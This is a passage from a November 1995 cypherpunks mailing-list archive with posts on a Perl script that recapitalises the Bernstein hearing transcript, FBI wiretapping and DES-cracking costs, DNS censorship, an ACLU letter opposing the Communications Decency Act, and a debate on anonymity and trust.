iQCVAwUBMJkNVY3DXUbM57SdAQG0ywQAiSlU7f1AujiaWQumqQmoIK8dyDoV32+Z
IlBYOxTG9uksIWPdGvQAkqcpPIx6OqOY2iA5FsX/YgjZNKjMjyrSf/cnopAM7GY3
SKDqc1thwMNAVmTFZn7emNafZ5bvwR86V340xdvH+/n396UXF9KeuqcIKk8yvKPI
QCOeBTmJ1RE=
=3Yeq
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Fri, 3 Nov 1995 05:22:52 +0800
To: cypherpunks@toad.com
Subject: Re: Transcript of Bernstein hearing is now available
In-Reply-To: <9511020308.AA25206@toad.com>
Message-ID: <199511021951.LAA03152@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> John Gilmore <gnu@toad.com> writes:
> We received the transcript of October 20's oral hearing from the court
> stenographer.  It's up on the EFF Web site at:

> http://www.eff.org/pub/Legal/Cases/Bernstein_v_DoS/Legal/951020_hearing.transcript

I find it hard to read things in all upper case.  Here's a slowish 95%
hack to make it more legible.  I imagine there's a 5-line way to do it
twenty times faster for 99% success, but what the heck...

	Jim Gillogly
	Highday, 12 Blotmath S.R. 1995, 19:47

-----------------------------------------------------------------------
#!/usr/bin/perl
# delegal: quick-n-dirty case conversion for Bernstein transcript
# 2 Nov 95, Gillogly

@propers =
( "daniel", "dan", "marilyn", "hall", "patel", "california", "bernstein",
  "united", "department", "state", "cohn", "coppolino", "national",
  "security", "agency", "steefel", "levitt", "weiss", "court", "i",
  "mc", "glashan", "sarrall", "lee", "tien", "ed", "ross", "susan", "arnold",
  "justice", "anthony", "mandel", "bazarov", "appeals", "helme", "webster",
  "states", "dorfmont", "constitution", "constitutional", "doe", "schechter",
  "snuffle", "june", "lowell", "cj", "edler", "olc", "mr", "ninth",
  "circuit", "judge", "ritchie", "english", "dr", "freedman", "o", "brien",
  "pentagon", "cubby", "compuserve", "golden", "gate", "san", "francisco",

);

$INDENT_UPALL = 13;     # If indented deeper than this, upcase each word
$INDENT_UPCOLON = 6;    # If indented with a colon and these spaces, upcase
$INDENT_PARA = 10;      # If indented this deep, upcase first word
$INDENT_SENT = 2;       # Pick up sentence starts

while ($proper = pop(@propers))
{
	($first, $rest) = ($proper =~ /^(.)(.*)$/);
	$first =~ tr/a-z/A-Z/;
	$caps{$proper} = $first . $rest;
}


while (<>)
{
	tr/A-Z/a-z/;            # Downcase everything
	s/u\.s\./U.S./g;        # special case
	s/d\.c\./D.C./g;        # special case
	s/([^a-z])nsa([^a-z])/$1NSA$2/g;  # Another one
	s/([^a-z])itar([^a-z])/$1ITAR$2/g;  # Another one

	# Upcase known proper names
	while (($proper, $cap) = each(%caps))
	{
		($first, $rest) = ($proper =~ /^(.)(.*)$/);
		s/([^a-z])$proper([^a-z])/$1$cap$2/g;
	}
	# If it's indented deeply, upcase each word
	if (/ {$INDENT_UPALL}/ || /: {$INDENT_UPCOLON}/)
	{
		while (($low) = /[^a-zA-Z]([a-z])/)
		{
			$low =~ tr/a-z/A-Z/;
			s/([^a-zA-Z])[a-z]/$1$low/;
		}
	}
	# Upcase middle initials
	while (($init) = / ([a-z])\./)
	{
		$init =~ tr/a-z/A-Z/;
		s/ [a-z]\./ $init\./;
	}
	# Upcase paragraphs
	if (($init) = / {$INDENT_PARA}([a-z])/)
	{
		$init =~ tr/a-z/A-Z/;
		s/( {$INDENT_PARA})[a-z]/$1$init/;
	}
	# Sentences
	($num, $_) = /^([ \d]*)([^ \d].*)$/; # Simplify
	while (($init) = /[^ ] {$INDENT_SENT}([a-z])/)
	{
		$init =~ tr/a-z/A-Z/;
		s/( {$INDENT_SENT})[a-z]/$1$init/;
	}
	$_ = $num . $_ . "\n";


	print $_;
}
-----------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Fri, 3 Nov 1995 02:10:11 +0800
To: Jay Campbell <cypherpunks@toad.com
Subject: Re: FBI seeks huge wiretapping system
In-Reply-To: <199511020955.BAA04564@you.got.net>
Message-ID: <9511021709.AA03831@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



On this topic...

We had lunch with the deputy director of the NSA yesterday. In between
agreeing to put backdoors in the Internet, help round up subversives and
build a DES cracker :-) the topic of telephone tapping came up.


One point that was quite clear, a lot of what happens in the federal 
government has more to do with the agency structure than common sense.
When the NSA are being asked to comment on an export license they
are being asked "is this thing dangerous", not "should it be exported".
But when the response comes back to commerce "its dangerous" you can 
hardly expect the person on the other end to put their neck out on the
line and risk allowing an export license.

Out another way this is a beuracracy where the objective is to avoid
the negative rather than gamble for a positive. Where risks are taken
they are calculated beuracratic risks.

What is needed is a federal task force to reevaluate the crypto 
export issue. This should look at whether the effect of the embargo
is positive or negative. Of course the result would be known in 
advance but would provide a shield to hide behind. Would be useful
if some other counterproductive policies were re-examined at the same
time, like the persecution of Phil Zimmerman.

On ITAR he did say that the policy met the desired objective. The 
particular objective concerned was not stated however. Probably if
they could tell us the objective we could provide a solution but then
again if they told us it would probably defeat the objective in itself.


On telephone tapping the statement was made that they do not allow 
unauthorized taps and that technology was making wildcat taps by
local officials harder. Which makes sense. If the taps are performed
digitally they should be easier to monitor at a management level.
It is a fair point that just because technology has changed the 
nature of the game it should not mean that wiretaps cease to be 
possible.

What is very odd however is the FBI request for $500 million. This is
a somewhat large quantity of money to say the least. The telephone
switches are programmable these days, it should be possible to 
provide tapping at substantially less cost. Mind you the Federal
government is not known for tight cost control. The NSA reconned that
a DES cracker would cost substantially more than $1 million because
the system costs would be much higher than the component costs.
"And it would only be able to operate on one keystream at once", also
note "DES is used more for authenticity than for confidentialty by
banks". One reading, the NSA can get the info they need at less cost than
breaking DES because the financial feeds are using DES to provide
CBC residues for MACs rather than encryption. Anyway the NSA price 
estimate was "two or more orders of magnitude more in cost". I dispute
that since we brought in the ZEUS trigger system at arround $40 million
five years ago and it is vastly more complex than a DES cracker, this
constitutes a system cost of about ten times the raw component cost.
there was considerably more component diversity and system copmplexity
than any cypher machine would need. The raw input bandwidth of 
6 Terabytes/sec would chew up DEs keyspace very quickly (ie it
is equaivalent to exhausting a 40bit keyspace in a second).

If the NSA want a cheap DES cracker they have my number. I'll take 5%
ot the difference between the actual cost and $100 million (their
estimate of cost) as my fee.


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rajaram@morgan.com (P. Rajaram)
Date: Fri, 3 Nov 1995 02:06:00 +0800
To: Hal <cypherpunks@toad.com
Subject: Re: ecash remailer
In-Reply-To: <199511020239.SAA27491@ix.ix.netcom.com>
Message-ID: <9511021209.ZM7820@morgan.com>
MIME-Version: 1.0
Content-Type: text/plain


On Nov 2,  7:23am, Hal wrote:
> Subject: Re: ecash remailer
> It's very frustrating to have to speculate so much due to the lack of
> information.  Imagine how we would react if Cybercash or Netscape had
> gone forward with what they claimed were secure protocols but had
> refused to publish them, referring simply to old papers on RSA and
> DES.  Yet Digicash gets away with this.

So, refuse to buy their money.
Demand open systems.

If you feel like being more terroristic, get Markoff to write an article
on how a cypherpunk expert feels that the Mark Twain Bankshares system
'may' be insecure.

-r




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "BITNET POSTMASTER" <POSTMAST@MVS.MEDCTR.UCLA.EDU>
Date: Fri, 3 Nov 1995 07:46:49 +0800
To: <cypherpunks@toad.com>
Subject: Reply to ERROR: MAX RETRIES E
Message-ID: <X5306122746>
MIME-Version: 1.0
Content-Type: text/plain


*** Sent by Alternate User "LM#LK" for "POSTMAST" ***
*** Original Author:  DRESCHS @ TANDEM - ** Remote User **; 11/02/95 12:27

>Message ID: X5306122746 WAS FORWARDED BY POSTMASTER@MGMT
>Original sender: DRESCHS    @TANDEM
>
>Received: from relay3.UU.NET by MVS.MEDCTR.UCLA.EDU (IBM MVS SMTP V2R2.1)
>   with TCP; Thu, 02 Nov 95 12:27:32 PDT
>Received: from toad.com by relay3.UU.NET with SMTP
> id QQzodt13430; Thu, 2 Nov 1995 15:16:35 -0500 (EST)
>Received: by toad.com id AA12091; Thu, 2 Nov 95 11:58:50 PST
>Received: from devnull (devnull.mpd.tandem.com) by toad.com id AA12085; Thu, 2
> Nov 95 11:58:42 PST
>Received: from galil.austnsc.tandem.com. by devnull (8.6.8/8.6.6)
> id NAA03606; Thu, 2 Nov 1995 13:58:28 -0600
>Received: (from dreschs@localhost) by galil.austnsc.tandem.com. (8.7.1/8.7.1) i
> OAA09507; Thu, 2 Nov 1995 14:00:32 -0600 (CST)
>Date: Thu, 2 Nov 1995 14:00:32 -0600 (CST)
>From: Sten Drescher <dreschs@mpd.tandem.com>
>Message-Id: <199511022000.OAA09507@galil.austnsc.tandem.com.>
>To: sameer <sameer@c2.org>
>Cc: cypherpunks@toad.com
>In-Reply-To: sameer's message of Thu, 2 Nov 1995 10:10:43 -0800 (PST)
>Subject: Re: censored? corrected  Steve Pizzo cited in The Spotlight
>References: <199511021624.KAA05751@galil.austnsc.tandem.com.>
> <199511021810.KAA14547@infinity.c2.org>
>Sender: owner-cypherpunks@toad.com
>Precedence: bulk
>
sameer <sameer@c2.org> said:

>>  Is it?  This is the _one_ thing in the article (is that term giving
>> it too much legitimacy?) that I whought was barely true.  Whoever
>> controls the root level DNS servers effectively controls the
>> Internet.  I postulated a couple of months ago about how the US Govt
>> might attempt to censor the rest of the world: "Remove
>> lurid.porno.site.other-country from your DNS system within 72 hours
>> or we will remove references to your DNS servers from the root level
>> servers.".  (I also speculated that if the US Govt tried doing this,
>> that an 'underground' DNS system would form almost immediately.)
>>

s>  The US govt. doesn't run the root nameservers, nor are all the
s> root nameservers within US jurisdiction.

 Granted, the US Govt doesn't run the US-based root servers.
But, if an Internet 'Decency' law was passed, they certainly could try
to threaten the US-based root server maintainers to make the cascading
threats.  And, as I understand the way DNS resolution works, address
requests go down to your root domain then up from the other root domain,
i.e., for me to find out what c2.org's address is, my system requests
from:
NS mpd.tandem.com
NS tandem.com
NS com
NS org

If this is correct, if the com NS has the entry for the org NS, I won't
be able to resolve those names.  Of course, explicit IP addresses and

*** Comments From: POSTMAST - POSTMASTER, BITNET; 11/02/95 12:54
Can someone please tell me how to remove/unsubscribe an email address
from this mail list.  I need the exact commands.  Apparently someone
subscribed to this list using an invalid email address and all the mail
messages are neding up in a bounced mail file.  We need to get this
email address unsubscribed.  Thank you for your help.

Postmaster
mvs.medctr.ucla.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Fri, 3 Nov 1995 04:32:49 +0800
To: hallam@w3.org
Subject: Re: FBI seeks huge wiretapping system
In-Reply-To: <199511020955.BAA04564@you.got.net>
Message-ID: <9511021924.AA12407@alpha>
MIME-Version: 1.0
Content-Type: text/plain



hallam@w3.org writes:
 > It is a fair point that just because technology has changed the 
 > nature of the game it should not mean that wiretaps cease to be 
 > possible.

I disagree that this is a "fair point".  That wiretaps are possible is
an accident of design.  Just because that slice of the salami appears
gone, I see no reason to concede that it can't be re-attached.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 3 Nov 1995 08:46:56 +0800
To: cypherpunks@toad.com
Subject: EMU_boo
Message-ID: <199511021830.NAA29064@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   11-2-95. FT:


   "Electronic money in a race with Emu."

      Economic and monetary union or electronic money? Recent
      suggestions that the start of Emu might be delayed
      beyond 1999 raise the intriguing possibility that a
      viable international electronic money will be available
      before the European single currency. Depending on your
      perspective, this would be either disaster or nirvana.
      Disaster, because governments and central banks in
      countries with weak currencies would lose the seignorage
      that currency issue brings, and the sovereignty it is
      supposed to provide (but may not). Disaster, because it
      would destroy two central aims of Emu: the sharing of
      power between monetary authorities, and the attempted
      imposition of currency soundness by institutional fiat.
      Nirvana, because it would provide people with a powerful
      protection against the random and hidden taxation
      imposed on them when governments inflate, and because it
      would create monetary soundness via market forces.


   EMU_boo  (5 kb)


   FT on the Web: <www.ft.com> or <www.usa.ft.com>. Selections
   avaliable, not this one, but read today's "Smart building"
   for the security and ID gadgets to track-attack-siphon.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 3 Nov 1995 07:47:06 +0800
To: cypherpunks@toad.com
Subject: ECC_boo
Message-ID: <199511021831.NAA29402@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   11-2-95. W$Japer:


   "Happy, Healthy and Odd: Nonconformists Live Longer."

      For modern-day eccentrics, computer hackers
      qualified, as did academics, scientists, rock stars and
      artists. Traits: nonconforming; creative; strongly
      motivated by curiosity; idealistic (wanting to make the
      world a better place and the people in it happier);
      cheerfully obsessed with one or more hobbyhorses; aware
      from early childhood of being different; intelligent,
      opinionated, outspoken; convinced of being right and
      that the rest of the world is out of step;
      noncompetitive (not in need of reassurance from the rest
      of society); unusual in eating habits and living
      arrangements; not particularly interested in the
      opinions or the company of other people, except to
      persuade them to his point of view; possessed of a
      mischievous sense of humor; single; usually the eldest
      or an only child; a bad speller.


   ECC_boo  (9 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 3 Nov 1995 04:31:53 +0800
To: cypherpunks@toad.com
Subject: CBW_boo
Message-ID: <199511021832.NAA29795@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   11-2-95. W$Japer:


   "Chemical and Biological Warfare Unmasked."

      For the first time in more than 25 years, the U.S. may
      be waking up to the seriousness of CBW. This high-level
      awakening is long overdue and reflected in a sudden
      increase in CBW sensor development research and counter-
      proliferation programs. Still, these steps blithely
      disregards 25 years of revolutionary advances in the
      biological and chemical sciences and the potential
      products of the Russian program. There is no allowance
      for "nonmilitary" CBW applications. Yet the most
      troublesome developments in the Russian CBW program are
      agents designed for covert use against diplomats,
      politicians and business executives. Also absent is
      serious attention to terrorist motivations and options.


   CBW_boo  (9 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <dreschs@mpd.tandem.com>
Date: Fri, 3 Nov 1995 07:54:16 +0800
To: sameer <sameer@c2.org>
Subject: Re: censored? corrected [Steve Pizzo cited in The Spotlight]
In-Reply-To: <199511021624.KAA05751@galil.austnsc.tandem.com.>
Message-ID: <199511022000.OAA09507@galil.austnsc.tandem.com.>
MIME-Version: 1.0
Content-Type: text/plain


sameer <sameer@c2.org> said:

>>  Is it?  This is the _one_ thing in the article (is that term giving
>> it too much legitimacy?) that I whought was barely true.  Whoever
>> controls the root level DNS servers effectively controls the
>> Internet.  I postulated a couple of months ago about how the US Govt
>> might attempt to censor the rest of the world: "Remove
>> lurid.porno.site.other-country from your DNS system within 72 hours
>> or we will remove references to your DNS servers from the root level
>> servers.".  (I also speculated that if the US Govt tried doing this,
>> that an 'underground' DNS system would form almost immediately.)
>> 

s> 	The US govt. doesn't run the root nameservers, nor are all the
s> root nameservers within US jurisdiction.

	Granted, the US Govt doesn't run the US-based root servers.
But, if an Internet 'Decency' law was passed, they certainly could try
to threaten the US-based root server maintainers to make the cascading
threats.  And, as I understand the way DNS resolution works, address
requests go down to your root domain then up from the other root domain,
i.e., for me to find out what c2.org's address is, my system requests
from:
NS mpd.tandem.com
NS tandem.com
NS com
NS org

If this is correct, if the com NS has the entry for the org NS, I won't
be able to resolve those names.  Of course, explicit IP addresses and
/etc/hosts entries would still work.

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ACLUNATL@aol.com
Date: Fri, 3 Nov 1995 09:23:41 +0800
To: beeson@aclu.org
Subject: Organizations Needed to Sign Letter Against Online Censorship
Message-ID: <951102140740_10830594@emout04.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain



CYBER-LIBERTIES ALERT!!!        November 2, 1995 
 
from: 
American Civil Liberties Union 
People for the American Way 
 
ORGANIZATIONS NEEDED TO SUPPORT FREE SPEECH IN CYBERSPACE 
 
SIGN THE LETTER BELOW TO OPPOSE FEDERAL ONLINE INDECENCY LEGISLATION! 
 
A conference committee of House and Senate members is now meeting to
determine the future of free speech in cyberspace.  As most of you know,
the House and Senate have now passed two different versions of the
telecommunications bill that would each outlaw "indecent" speech over the
Internet and other online services. 
 
The conference committee now has the power to remove the online indecency 
provisions and to respect the philosophy overwhelmingly approved by the
House in their 420-4 vote in favor of the Cox/Wyden Amendment -- online
users, not government, should determine what online content is appropriate
for themselves and their families. 
 
Groups like the Christian Coalition are contacting the Conference Committee
to urge even stricter criminal provisions for cyberspace than those
contained in the current telecommunications provisions.  Organizations
dedicated to free speech must counter that movement with a groundswell of
opposition to government control over online content. 
 
THIS MAY BE YOUR LAST CHANCE TO STOP UNCONSTITUTIONAL RESTRICTIONS ON YOUR
RIGHT TO FREE SPEECH IN CYBERSPACE. 
 
Please sign your organization on to the letter below.  To sign on, send an
e-mail with your organization's name, address, phone number, and e-mail
address to: 
 
Jill Lesser 
People for the American Way 
jlesser@pfaw.org 
 
The deadline for signatures is MONDAY, NOVEMBER 6, 1995, at 5 p.m. 
 
(Due to time constraints, we regret that we are unable to accept further
revisions to the letter.) 
 
------------------------ 
INDIVIDUAL USERS!!! 
 
It is also essential that the Conference Committee hear from individual
online users who are fundamentally opposed to these draconian speech crimes
for cyberspace.  Be sure to watch the Net for an action alert within the
next 24 hours on how to voice your opposition to the Conferees. 
 
------------------------ 
LETTER FROM ORGANIZATIONS OPPOSED TO 
FEDERAL ONLINE INDECENCY LEGISLATION 
 
November ___, 1995 
 
The Honorable Thomas J. Bliley Jr. 
Chairman, Committee on Commerce 
United States House of Representatives 
Washington, DC 20515 
 
The Honorable Larry Pressler 
Chairman, Committee on Commerce, 
Science and Transportation 
United States Senate    
Washington, DC 20510 
 
Re:  Parental Empowerment and Free Expression in Cyberspace 
 
Dear Chairmen Bliley and Pressler: 
 
We write on behalf of a diverse coalition of non-profit civil liberties,
education, library, cultural, arts, labor and other civic organizations,
and commercial producers and distributors of entertainment, information,
journalism, and art, to express our strong belief that the Communications
Decency Act (CDA) (also known as the +Exon Amendment+), sections 401 to 408
of S. 652, is unconstitutional, unworkable and unwise.  We also strongly
beleive that language added to HR 1555, (section 403) amending the federal
criminal code (the Hyde Amendment) is similarly unacceptable, because it
creates new Exon-like speech crimes, including restricting constitutionally
protected speech, mandating vicarious liability for on-line service
providers and endorsing the violatation of privacy rights of individuals. 
 
We urge you to delete from any final telecommunications legislation any
provisions that impose a federal regulatory scheme on online content, hold
online service providers liable for the messages of their customers, censor
online communications in violation of the First Amendment, or encourage the
violation of the privacy of online users.  The CDA and Hyde Amendment
contain an approach and philosophy that almost every member of the House of
Representatives has already expressly rejected in their 420-4 vote in favor
of the Online Family Empowerment provisions offered as an amendment to HR
1555 (section 104) by Representatives Cox (R-CA) and Wyden (D-OR). 
 
The CDA would impose unenforceable and intrusive government regulation on a
newly developing forum for speech and commerce.  While failing to
accomplish its intended goal of protecting children, it would unwisely
impose governmental mandates on content and effectively establish federal
standards for parenting in an online world.  Similarly, the Hyde Amendment
would force  
online service providers to act as censors of constitutionally protected
speech and to invade the privacy of their users. By creating
unconstitutional standards, passage of the CDA or the Hyde Amendment merely
would assure a decade of expensive litigation and the uncertainty that
inevitably accompanies such lawsuits. 
 
As the Conference Committee begins to consider the question of content
control in the online environment, it must not permit unconstitutional
provisions to remain in the bill.  The Conferees challenge is to avoid
interfering with private sector development of effective blocking and
screening technologies that empower online users to make personal decisions
about content, to preserve the fundamental freedoms of the First Amendment,
and to protect each individual's right to keep private communications
private. 
 
The undersigned organizations believe that the following principles must be
adhered to in any provision that affects the emerging online environment: 
 
THE FIRST AMENDMENT RIGHTS OF ALL AMERICANS MUST BE PRESERVED. 
 
Any effort to establish federal control over constitutionally protected
speech must be opposed outright.  There are alternative ways to protect
access by children to certain material without infringing on the free
speech rights of adults.  The Supreme Court has repeatedly ruled that
Congress may not impose a blanket ban on constitutionally protected speech.
 Any general restriction on constitutionally protected content must not
only serve a compelling government interest but also must be implemented by
the least restrictive means available. 
 
POLICIES MUST EMPOWER USERS -- INCLUDING PARENTS -- TO MAKE PERSONAL
DECISIONS ABOUT CONTENT. 
 
While most Americans agree that certain material is unsuitable for
children, there certainly is no consensus about precisely what that
material might be.  The right to decide what children should see and hear
is uniquely personal to the family -- government should have no role in
dictating such personal and private matters.  Instead, policies should
encourage and empower  
individual parents to make decisions about the kinds of content to which
their children should have access. 
 
THERE SHOULD BE NO INCENTIVE FOR GOVERNMENT OR PRIVATE INDUSTRY TO INFRINGE
ON PRIVACY RIGHTS BY READING PRIVATE E-MAIL. 
 
Neither online service providers nor federal regulators should be in the
business of perusing private e-mail for potentially objectionable content. 
The privacy rights in e-mail that Congress recognized in its passage of the
Electronic Communications Privacy Act should not be undercut through  
censorship legislation. 
 
THE ONLINE WORLD MUST OPERATE FREE FROM INTRUSIVE AND UNENFORCEABLE
GOVERNMENT CONTENT REGULATION. 
 
Online service providers and other sectors of the communications industry
already are taking the initiative to develop technologies to permit users
to make choices about the content to which they have access.  
Governmentally imposed standards and mandates are no substitute for the
creativity of the marketplace.  Users are demanding technology that will
preserve the free flow of information, while simultaneously allowing them
to make personal decisions about the content to which they or their
children have access. 
 
CONCLUSION 
 
The undersigned organizations believe that Congress can formulate policies 

consistent with its deregulatory approach and consistent with the  
Constitution.   We stand ready to work with all members of the Conference  
Committee to ensure that the above principles are satisfied. 
 
[The following organizations signed on to a similar letter last summer,
before the House vote on the telecommunications bill.] 
 
Alliance For Community Media 
Alliance for Communications Democracy 
American Arts Alliance 
American Association of Advertising Agencies, Inc. 
American Association of Law Libraries 
American Association of University Professors 
American Civil Liberties Union 
American Communication Association 
American Library Association 
American Society of Journalists and Authors 
Association of American Publishers 
Association of Research Libraries 
Center For Democracy & Technology 
Chicago Computer Society 
Computer Professionals for Social Responsibility 
Council of Literary Magazines and Presses 
Electronic Privacy Information Center 
Feminists for Free Expression 
Freedom to Read Foundation 
Libraries for the Future 
The Literary Network 
Magazine Publishers Association 
Media Access Project 
Media Consortium 
National Assembly of State Arts Agencies 
National Association of Artists Organizations 
National Association of Media Arts & Culture 
National Campaign for Freedom of Expression 
National Coalition Against Censorship 
National Federation of Community Broadcasters 
National Gay & Lesbian Task Force 
National Public Telecomputing Network 
New York City Arts Coalition 
Newspaper Association of America 
Society for Electronic Access 
People For the American Way Action Fund 
Rock Out Censorship 
Theater Communications Group 
Writers Guild of America, East






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 3 Nov 1995 05:15:10 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: [FRED] Anonymity and Integrity
In-Reply-To: <9511021110.AA01070@all.net>
Message-ID: <199511021934.OAA22117@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Frederick B. Cohen writes:
> To clarify even further, I seem to recall a posting some months ago from
> an anonymous source declaring a new on-line for-sale forum called the
> Internet Security Newsletter (or some such thing).  The anonymity of the
> poster in the context of asking for money and the fact that one of the
> people who was claimed to be on the board of editors was not, in fact, a
> participant, led to the question of who the person was.  

The poster wasn't actually anonymous, but rather pseudonymous, in that case.
(The pseudonym was the name of the publication, as I recall.)

> It turned out
> that this person had a substantial history of putting forth falsehoods
> as well as other related things that might have been very helpful in
> evaluating the credence of his statements.  It turned out that the
> newsletter was, at least in some sense and without making value
> judgements, legitimate; but the anonymity of the person making the posts
> made it harder to assure the integrity of the statements made, which
> exacerbated the assurance issue. 

It seems to me that the integrity of the statements was rather easily verified
based on the merits of the statements themselves. In particular, one or two
participants in the forum denied the claims made that they were members of
the editorial board.

Granted, some people would have been more inclined to look askance at the
messages if they had known the author's True Name. But as the saying goes,
"past performance is not a guarantee of future results". You can choose to
doubt or believe a message because of the author's past reputation. But
reputation is not a reliable predictor of the integrity of future assertions.
It's a nice psychological crutch, but reliance on a "rational expectation" is
a long way from anything I would call "assurance" or "verification". It
doesn't prove anything. The only acceptable method of assurance I can see is
careful analysis of the propositions posited, and empirical verification of
the facts presented. Leaning on past reputation is accepting an odd form of
Proof by Authority.

As it happened I had never heard of the True Name of the sender, so the
knowledge wasn't useful to me.

> I understand that over time, reputations can be built up for pseudonyms
> (which are not necessarily anonyms) but then, with a pseudonym we might
> reasonably ask what the motive is for hiding the real identity.  
[possible motives...]
> Without knowing the motive, how can we assess the statements? 

By asking yourself if they seem to make sense, checking them against known
facts and beliefs, etc. The same methods, IMHO, that are mainly appropriate
to assess anyone's statements.

> In fact, how can we know that the original pseudonym still
> applies? Someone could kill you and take over your pseudonym, and even
> though we might hear of your death, the pseudonym might continue based
> on your reputation but with another actual source.

Of course, the is-a-person problem has been discussed at great length. 
Digital signatures are as effective for pseudonyms as for anyone else.
The messages we've seen "from Alice de `nonymous" might all have come from
different senders. They exhibit a common tone and style, but that doesn't
assure us of anything. In a sense that makes them more inviting,
since there's always the chance that a third party is attempting a clever
parody or a sly bit of character assassination.

[...]
> It's an interesting concept that each statement should/could be taken on
> its own and evaluated independently of the rest of a person's life
> context, but in my experience, that has serious problems.

In my experience, that's about all I can usually do in network communication.
In principle I _could_ devote scads of time to background investigations of
my correspondents, for all except strongly anonymous and strongly 
pseudonymous parties, but I don't find that approach realistic.

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 3 Nov 1995 07:25:00 +0800
To: cypherpunks@toad.com
Subject: LAF_las
Message-ID: <199511021959.OAA07546@pipe5.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   For we CIA-corn peckers:

   Wash Rag today hangs out Page Oner on the billions wasted on
   armaments based on flawed data by the CIA. It has pointers 
on
   how the spooks chew the raw spew and hawk oysters upstairs.

   Two, NYPaper chickenshits editorially on the same, clucks
   affirmation of Deutch and US Congress under-oversight.

   Three, contrarily, NYP's Maureen Dowd ridicules the CIA
   macho history of acceptable wickedness in the public
   interest, and hoots at Deutch's "mensch" complicity, saying
   that laughable agencies don't survive godawfully wicked
   Washington. Cackling right on, Mo.


   LAF_las











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Andrew Stevenson <frank@funcom.no>
Date: Thu, 2 Nov 1995 23:20:58 +0800
To: cypherpunks@toad.com
Subject: REQUEST: Win95 password encryption details
In-Reply-To: <199511020642.WAA17156@Networking.Stanford.EDU>
Message-ID: <Pine.SGI.3.91.951102155921.6835A-100000@odin>
MIME-Version: 1.0
Content-Type: text/plain



Can anyone please give pointers to the details of the
.PWL password encryption. Thanks.

	Frank


On Wed, 1 Nov 1995, Rich Graves wrote:
> ..., and someone else later picks up the .PWL files, which are not
> encrypted in a particularly secure way, ...


#include <std/disclaimer.h>
Key fingerprint =  E3 D2 BC AD BE F8 C8 2F  A5 89 1D 2B 67 30 EA 1B
PGP encrypted mail preferred, finger for key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Fri, 3 Nov 1995 10:49:28 +0800
To: cypherpunks@toad.com
Subject: Anonymity and integrity
In-Reply-To: <199511021934.OAA22117@opine.cs.umass.edu>
Message-ID: <9511022111.AA15199@all.net>
MIME-Version: 1.0
Content-Type: text


Futplex <futplex@pseudonym.com> opines:

... [example was here - saving bandwidth]...

> It seems to me that the integrity of the statements was rather easily verified
> based on the merits of the statements themselves. In particular, one or two
> participants in the forum denied the claims made that they were members of
> the editorial board.
> 
> Granted, some people would have been more inclined to look askance at the
> messages if they had known the author's True Name. But as the saying goes,
> "past performance is not a guarantee of future results". You can choose to
> doubt or believe a message because of the author's past reputation. But
> reputation is not a reliable predictor of the integrity of future assertions.
> It's a nice psychological crutch, but reliance on a "rational expectation" is
> a long way from anything I would call "assurance" or "verification". It
> doesn't prove anything. The only acceptable method of assurance I can see is
> careful analysis of the propositions posited, and empirical verification of
> the facts presented. Leaning on past reputation is accepting an odd form of
> Proof by Authority.

You are correct in stating that it doesn't prove anything, but that, it
seems to me, is universally true.  Nothing you can ever do can prove
absolute integrity.  The issue then comes down to whether you get more
integrity by knowing (or having access to) the full body of informaiton
about a source.  I think you do.

> As it happened I had never heard of the True Name of the sender, so the
> knowledge wasn't useful to me.

But with the name, if you had chosen to, you could have done a great
deal to learn about the history of the individual - through his
published works, the many fine and not so fine things he has done in his
career, etc.  It is the availability of this reference material that
makes the identity that much more useful. 

> > I understand that over time, reputations can be built up for pseudonyms
> > (which are not necessarily anonyms) but then, with a pseudonym we might
> > reasonably ask what the motive is for hiding the real identity.  
> [possible motives...]
> > Without knowing the motive, how can we assess the statements? 
> 
> By asking yourself if they seem to make sense, checking them against known
> facts and beliefs, etc. The same methods, IMHO, that are mainly appropriate
> to assess anyone's statements.

It is interesting that you take this line, especially in a forum where
so many people trust so much that is posted without verifying it.  For
